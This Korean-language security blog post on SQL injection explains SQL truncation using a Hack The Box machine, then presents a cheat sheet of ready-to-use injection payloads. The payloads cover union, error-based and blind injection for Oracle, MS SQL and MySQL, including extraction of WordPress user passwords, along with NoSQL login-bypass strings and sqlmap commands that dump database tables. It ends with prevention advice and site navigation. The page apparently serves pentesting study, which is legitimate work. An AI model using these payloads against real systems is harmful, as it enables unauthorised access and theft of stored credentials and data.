🔎 What is SQL injection?

SQL Truncation

SQL Truncation (SQL 절단 공격)

SQL Truncation 취약점은 데이터베이스가 길이 제한으로 인해 사용자 입력을 자를 때 발생합니다.
공격자는 사용자 이름과 같은 중요한 필드의 길이에 대한 정보를 수집하고 이 정보를 악용하여 무단 액세스를 얻을 수 있습니다.
SQL 절단 취약점은 일반적으로 MySQL 데이터베이스에 존재합니다. 이 취약점은 WordPress CMS와 관련된 CVE-2008-4106에서 처음 설명되었습니다.

공격 예시 : HTB-Book 참조

회원 가입 시 이메일 필드에서 20글자의 제한과 admin의 이메일 계정이 admin@book.htb 인것을 확인

sql1 sql2

20글자의 제한이므로 스페이스(+공백)을 추가하여 20글자 와 임의의 문자열을 추가하여 계정 생성 시 20글자 이후의 문자열을 잘리게 되고 공백만 남게되어 admin@book.htb의 계정이 중복 생성되어 admin계정으로 로그인 가능

sql3 sql4 1

🍁 Cheat sheet

`Oracle`

Union SQL

' order by 1--
# 데이터 형 조회
NULL 형 = ' union select null,null,null from dual --
숫자형 = ' union select null,null,123 from dual --
문자형 = ' union select null,null,'123' from dual --
# 테이블 명 조회 
' union select null,table_name,null,null from all_tables -- 
# 컬럼 명 조회
' union select null,column_name,null,null from all_tab_columns where table_name='useegod' --
# 데이터 조회
' union select null,alias,null,name from useegod --

Error Based SQL

# 테이블 개수 확인
a%' and ctxsys.drithsx.sn(user,(select count(table_name) from user_tables))=1 and '%1%'='%1
# 테이블 명 조회
a%' and ctxsys.drithsx.sn(user,(select table_name from (select table_name, rownum as rnum from user_tables) where rnum=1))=1 and '%1%'='%1
# 테이블 컬럼 갯수 조회
a%' and ctxsys.drithsx.sn(user,(select count(column_name) from all_tab_columns where table_name='useegod_ANSWER'))=1 and '%1%'='%1
# 컬럼 명 조회
a%' and ctxsys.drithsx.sn(user,(select column_name from (select column_name,rownum as rnum from all_tab_columns where table_name='useegod_ANSWER') where rnum=1))= 1 and '%1%'='%1
# 데이터 갯수 조회
a%' and ctxsys.drithsx.sn(user,(select count(ANSWER_COLUMN) from useegod_ANSWER))=1 and '%1%'='%1
# 데이터 조회
a%' and ctxsys.drithsx.sn(user,(select ANSWER_COLUMN from (select ANSWER_COLUMN, rownum as rnum from useegod_ANSWER) where rnum=1))=1 and '%1%'='%1

Blind SQL

# 테이블 개수 확인
' and (select count(table_name) from all_tables) < 74 -- 
# 테이블 명 조회
' and ascii(substr((select table_name from (select rownum as rnum,table_name from user_tables) where rnum=1),1,1)) < 130 -- 
# 컬럼 개수 조회
' and (select count(column_name) from all_tab_columns where table_name='useegod')=21 --
# 컬럼명 조회
' and ascii(substr((select column_name from (select rownum as rnum, column_name from all_tab_columns where table_name ='useegod') where rnum=1),1,1)) < 130 --
# 데이터 수 조회
' and (select count(userID) from USEEGOD) < 324 --
# 데이터 조회
' AND ASCII(SUBSTR((SELECT userID FROM (SELECT ROWNUM AS RNUM, userID FROM USEEGOD) WHERE RNUM=1),1,1)) < 130 --

`MsSQL`

Union SQL

# 컬럼 개수 파악
' union select null,null from information_schema.tables --
# 컬럼 데이터 형 파악
' union select '1234',null from information_schema.tables --
# 테이블 명 조회
' union select table_name,null from information_schema.tables --
# 컬럼 명 조회
' union select column_name,null from information_schema.columns where table_name='user' --
# 데이터 확인
' union select id,null from users --
' union select name,null from users --
' union select pass,null from useres --

`MySQL`

Union SQL

# 컬럼 개수 파악
' order by 24#
' or 1=2 union select 1,2,3,4,5,6,7,8,9,@@version,11#
# 테이블 명 조회
' or 1=2 union select 1,2,3,4,5,6,7,8,9,table_name,11 from information_schema.tables#
# 컬럼 명 조회
' or 1=2 union select 1,2,3,4,5,6,7,8,9,column_name,11 from information_schema.columns WHERE table_name='wp_users'#
# 데이터 확인
' or 1=2 union select 1,2,3,4,5,6,7,8,9,user_login,11 from wp_users#
' or 1=2 union select 1,2,3,4,5,6,7,8,9,user_pass,11 from wp_users#

Error Based SQL

a%' and extractvalue(rand(),concat(0x3a,version())) and '%1%'='%1
# 데이터베이스 명 조회
a%' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 0,1))) and '%1%'='%1
# 테이블 명 조회
a' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE table_schema="skinfosec" LIMIT 0,1))) and '%1%'='%1
# 컬럼 명 조회
a%' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_NAME="eqst_answer" LIMIT 0,1))) and '%1%'='%1

`NoSQL`

비교연산자	연산조건
NOT_NULL	값이 존재하면
NULL	값이 존재하지 않으면
EQ(Equal)	값이 같으면
NE(Not Equal)	값이 같지 않으면
LE(Less than or EQ)	값이 작거나 같으면
LT(Less than)	값보다 작으면
GT(Greater than)	값보다 크면
GE(Greater than or EQ)	값이 크거나 같으면
CONTAINS	집합 내 포함됨
NOT_CONTAINS	집합 내 포함되지 않음
BEGINS_WITH	첫번째 문자 일치
BETWEEN	값이 사이에 존재하면
IN	값의 열거 목록 중 하나라도 참이면

Basic Authentication Bypass

# Basic authentication bypass using not equal ($ne) or greater ($gt)
in DATA
username[$ne]=toto&password[$ne]=toto
login[$regex]=a.*&pass[$ne]=lol
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto

in JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}

SQL - Mongo

Normal sql: 
' or 1=1-- -
Mongo sql: 
' || 1==1//
' || 1==1%00
' || '1==1

sqlmap

sqlmap -r login.req
# 데이터베이스 조회
sqlmap -r login.req --dbs
# main 데이터베이스 내의 테이블 조회
sqlmap -r login.req -D main --tables
# main 데이터베이스 user 테이블 내용 덤프
sqlmap -r login.req -D main -T user --dump

👀 How to Prevent ?

데이터베이스와 연동하는 모든 파라미터들에 대해 사용자의 입력 값이 SQL 쿼리로 해석되지 않도록 특스문자 (‘, “, /, \, ; , :, Space, –, +, =, (, ), #, %, <,> ) 및 인젝션 키워드(union, select, update, drop, cmshell, xp, sp 등)에 대한 문자열 검증 로직 추가
MS-SQL의 경우 사용하지 않는 Master Table 내의 프로시저를 제거해야 함 (xp_cmdshell, xp_stratmail, xp_sendmail, xp_grantlogin, sp_makewebtask, xp_regred, xp_regwrite)
JSP로 구현된 웹 애플리케이션의 경우 PreparedStatement 클래스를 사용하여 매개변수 값을 문자열로 처리될 수 있도록 setString 등과 같은 setXXX 함수를 사용하여 구현
DB에러 메시지는 공격자에게 정보를 제공하므로 에러메시지 및 DBMS에서 제공하는 에러코드가 노출되지 않도록 예외처리 적용
ORM(Object Relational Mapper)같은 검증된 SQL 라이브러리를 사용하여 안전한 쿼리 작성 권장

📃 References

PortSwigger SQL injection

SQL Injection

🔎 What is SQL injection?

SQL Truncation (SQL 절단 공격)

🍁 Cheat sheet

`Oracle`

Union SQL

Error Based SQL

Blind SQL

`MsSQL`

Union SQL

`MySQL`

Union SQL

Error Based SQL

`NoSQL`

Basic Authentication Bypass

SQL - Mongo

sqlmap

👀 How to Prevent ?

📃 References

HTB-Magic Write up

HTB-Book Write up

IP 대역 분할 표

Bypass NAC

AWS Cheat Sheet

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

SQL Injection

🔎 What is SQL injection?

SQL Truncation (SQL 절단 공격)

🍁 Cheat sheet

Oracle

Union SQL

Error Based SQL

Blind SQL

MsSQL

Union SQL

MySQL

Union SQL

Error Based SQL

NoSQL

Basic Authentication Bypass

SQL - Mongo

sqlmap

👀 How to Prevent ?

📃 References

HTB-Magic Write up

HTB-Book Write up

You may also like

IP 대역 분할 표

Bypass NAC

AWS Cheat Sheet

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

Explore Tags

`Oracle`

`MsSQL`

`MySQL`

`NoSQL`